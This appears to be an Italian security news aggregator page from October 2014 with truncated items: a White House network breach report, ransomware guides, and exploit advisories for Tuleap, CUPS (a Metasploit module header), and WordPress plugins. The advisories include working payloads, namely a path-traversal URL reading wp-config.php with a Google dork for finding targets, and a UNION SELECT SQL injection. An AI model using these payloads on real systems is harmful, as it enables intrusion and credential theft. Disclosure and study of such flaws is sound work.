White House computer network ‘hacked’

29 ottobre 2014 - Fonte: http://www.mondounix.com

white house computer network hacked

A White House computer network has been breached by hackers, it has been reported.

The unclassified Executive Office of the President network was attacked, according to the Washington Post.

US authorities are reported to be investigating the breach, which was reported to officials by an ally of the US, sources said.

White House officials believe the attack was state-sponsored but are not saying what - if any - data was taken.

In a statement to the AFP news agency, the White House said "some elements of the unclassified network" had been affected.

A White House official, speaking on condition of anonymity, told the Washington...

Leggi il seguito »

NuevoLabs flash player for clipshare SQL Injection

29 ottobre 2014 - Fonte: http://www.mondounix.com
Nuevolabs Nuevoplayer for clipshare SQL Injection
=======================================================================
 
:: ADVISORY SUMMARY ::
Title:     Nuevolabs Nuevoplayer for clipshare Sql Injection
Vendor:    NUEVOLABS (www.nuevolabs.com)
Product:   NUEVOPLAYER for clipshare
Credits:   Cory Marsh - protectlogic.com
Discovery: 2014-10-10
Release:   2014-10-28
 
Nueovplayer is a popular flash video player with integration into multiple popular video sharing suites.  The most 
notable is Clipshare (clip-share.com).  Nuevoplayer provides flash video playing capabilities to third party video 
sharing suites.
 
 
:: VULNERABILITY ::
Type:     SQL Injection and Privilege Escalation
Category: Remote
Severity:...

Leggi il seguito »

Tuleap 7.4.99.5 Remote Command Execution

29 ottobre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
Tuleap does not validate the syntax of the requests submitted to SVN handler pages in order to validate weather request passed to passthru() function are introducing any extra parameters that would be executed in the content of the application.
 
This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application that would execute them as shown on the attached Proof Of Concept code below.
 
After registering with the application...

Leggi il seguito »

Tuleap 7.2 XXE Injection

29 ottobre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz
 
Details:
 
A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.
 
Vulnerability 1:
 
1) Upload a XXE using the following request:
 
 
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0)...

Leggi il seguito »

Tuleap 7.4.99.5 Blind SQL Injection

29 ottobre 2014 - Fonte: http://www.mondounix.com
Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent:...

Leggi il seguito »

Rimozione Virus Ransomware anche per utenti non esperti

28 ottobre 2014 - Fonte: http://www.mondounix.com
Un ransomware è un virus che cripta tutti i dati all'interno dell'hard disk e impedisce il regolare avvio di windows mostrando una schermata dove viene chiesto del denaro, in cambio dei dati sull'hard disk..
 
 
Ecco una guida passo passo per rimuovere il virus...
Occorrente:
1)Il pc infettato ( chiaramente )
2)Un CD o DVD vuoto
3)Un altro PC ( o il pc infetto con una connessione a internet)
 
 
Procedimento:
Questi tipi di Virus essenzialmente sono fatti per mandare in panico l'utente medio.... quindi uno dei consigli che dovete seguire: mantenervi calmi e rimanere concentrati su come si comporta il virus... perchè come tutto.. anche i virus hanno delle vulnerabilità.
Detto questo... possiamo iniziare....
1)All’avvio...

Leggi il seguito »

Ransomware allarme web il malware truffa per telefono

28 ottobre 2014 - Fonte: http://www.mondounix.com

RANSOMWARE

Da un momento all'altro può capitare di trovarsi ostaggio dei pirati informatici, sul proprio computer inopinatamente bloccato.
E poterlo sbloccare soltanto telefonando a un numero a pagamento, salatissimo.
Tutta colpa di un malware - fa sapere il Centro Nazionale Anticrimine Informatico per la Protezione delle Infrastrutture critiche del Servizio Polizia Postale e delle Comunicazioni - che si chiama "Ransomware", un trojan noto a molti utenti della rete (solo quelli che usano sui loro computer sistemi operativi WIndows) per averli colpiti già dal 2006.

Ai tempi impediva l'utilizzo del computer per poi richiedere un codice di sblocco, ottenibile...

Leggi il seguito »

CUPS Filter Bash Environment Variable Code Injection

28 ottobre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a post-auth code injection in specially crafted
        environment variables in Bash, specifically targeting CUPS filters
        through the PRINTER_INFO and PRINTER_LOCATION variables by default.
      },
      'Author' => [
        'Stephane Chazelas',...

Leggi il seguito »

WordPress Download Manager Arbitrary File Download

28 ottobre 2014 - Fonte: http://www.mondounix.com
# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
 
 
# Xploit: Find one website with use /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php

(12)

...

Leggi il seguito »

WordPress HTML5 / Flash Player SQL Injection

28 ottobre 2014 - Fonte: http://www.mondounix.com
# WordPress HTML5 and FLash PLayer Plugin SQL Injection
# CWE: CWE-89
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 24/10/2014
# Vendor Homepage: https://wordpress.org/plugins/player/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl: "Index of" +inurl:/wp-content/plugins/player/
 
# PoC : 
 
http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()--
 
 
# Xploit: Are vulnerable sites that have...

Leggi il seguito »